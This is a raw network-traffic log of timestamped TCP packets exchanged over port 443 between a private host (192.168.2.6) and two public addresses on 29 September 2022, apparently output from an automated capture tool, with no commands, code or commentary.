                                                                                                                                                            Sep 29, 2022 14:44:55.307749987 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:55.307804108 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.339689016 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.339777946 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.339840889 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:55.339864016 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.339883089 CEST44349725140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.339934111 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:55.340758085 CEST49725443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:55.341743946 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.341784000 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.341872931 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.342371941 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.342386007 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.381793976 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.401295900 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.401321888 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.567240953 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.569278002 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.569319010 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.569470882 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.569519043 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.569544077 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.569592953 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.572361946 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.572398901 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.572726011 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.572751999 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.585568905 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.585618019 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.585752010 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.585774899 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.585796118 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.587989092 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.588032007 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.588135958 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.588162899 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.588182926 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.590475082 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.590517998 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.590616941 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.590645075 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.590662956 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.591970921 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.592009068 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.592133999 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.592156887 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.599792957 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.599833965 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.599977970 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.599998951 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.601243019 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.601270914 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.601360083 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.601382971 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.601401091 CEST44349726185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:55.601452112 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:55.611409903 CEST49726443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.059567928 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.059628010 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.059708118 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.060163975 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.060184956 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.109599113 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.111222029 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.111253023 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.288292885 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.288444996 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.288562059 CEST44349727140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.288566113 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.288639069 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.289078951 CEST49727443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.290127039 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.290225029 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.290319920 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.290817976 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.290843010 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.334742069 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.337759018 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.337794065 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515208006 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515338898 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515391111 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515414953 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.515439987 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515480042 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515508890 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.515516043 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515531063 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515561104 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.515587091 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515621901 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515635967 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.515651941 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.515755892 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.515770912 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.516426086 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.516514063 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.516525984 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.519601107 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.519645929 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.519721985 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.519740105 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.519764900 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.519792080 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.532418013 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.532459021 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.532629967 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.532664061 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.534481049 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.534527063 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.534662008 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.534687042 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.534710884 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.536818027 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.536844969 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.537060022 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.537113905 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.546837091 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.546869993 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.547058105 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.547086000 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.547996998 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.548022032 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.548161983 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.548182011 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549693108 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549742937 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549787998 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549863100 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.549890995 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549911976 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.549911976 CEST44349728185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.549981117 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.551060915 CEST49728443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:56.714027882 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.714107990 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.714209080 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.714751959 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.714796066 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.767292976 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:56.769517899 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:56.769556999 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.098453045 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.098686934 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.098834991 CEST44349729140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.098862886 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:57.098941088 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:57.100409985 CEST49729443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:57.103385925 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.103473902 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.103768110 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.104640961 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.104690075 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.147677898 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.162172079 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.162216902 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358023882 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358099937 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358144999 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358241081 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.358241081 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.358264923 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358371019 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358426094 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358450890 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.358458996 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358491898 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358506918 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.358511925 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.358567953 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.358573914 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.359463930 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.360745907 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.360763073 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.362689972 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.362725019 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.362819910 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.362837076 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.362910986 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.362910986 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.374893904 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.374932051 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.375148058 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.375171900 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.378329992 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.378365040 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.378464937 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.378465891 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.378484964 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.378912926 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.378937006 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.379025936 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.379025936 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.379039049 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.380748034 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.380779982 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.380877018 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.380877018 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.380889893 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.389657974 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.389687061 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.389758110 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.389785051 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.389825106 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.391355991 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.391386986 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.391477108 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.391499043 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.391537905 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.392436028 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.392460108 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.392510891 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.392534971 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.392568111 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.394171000 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.394202948 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.394301891 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.394301891 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.394324064 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.394902945 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.394926071 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.395018101 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.395018101 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.395034075 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.395993948 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.396024942 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.396080971 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.396101952 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.396250010 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.397087097 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.397109985 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.397197008 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.397197008 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.397218943 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.397990942 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.398020029 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.398143053 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.398143053 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.398161888 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.405096054 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.405124903 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.405287027 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.405287027 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.405307055 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406261921 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406292915 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406392097 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.406392097 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.406409025 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406667948 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406689882 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406780005 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.406794071 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.406833887 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.406965017 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.407001972 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.407107115 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.407107115 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.407119989 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.407772064 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.407794952 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.407908916 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.407908916 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.407922983 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.408662081 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.408694029 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.408747911 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.408767939 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.408986092 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.409331083 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.409353971 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.409454107 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.409454107 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.409466982 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410126925 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410156965 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410222054 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.410233021 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410336971 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410356998 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410363913 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.410373926 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.410397053 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.410434961 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.411092043 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.411123037 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.411180019 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.411195993 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.411195993 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.411209106 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.411252022 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.411397934 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.412014008 CEST44349730185.199.110.133192.168.2.6
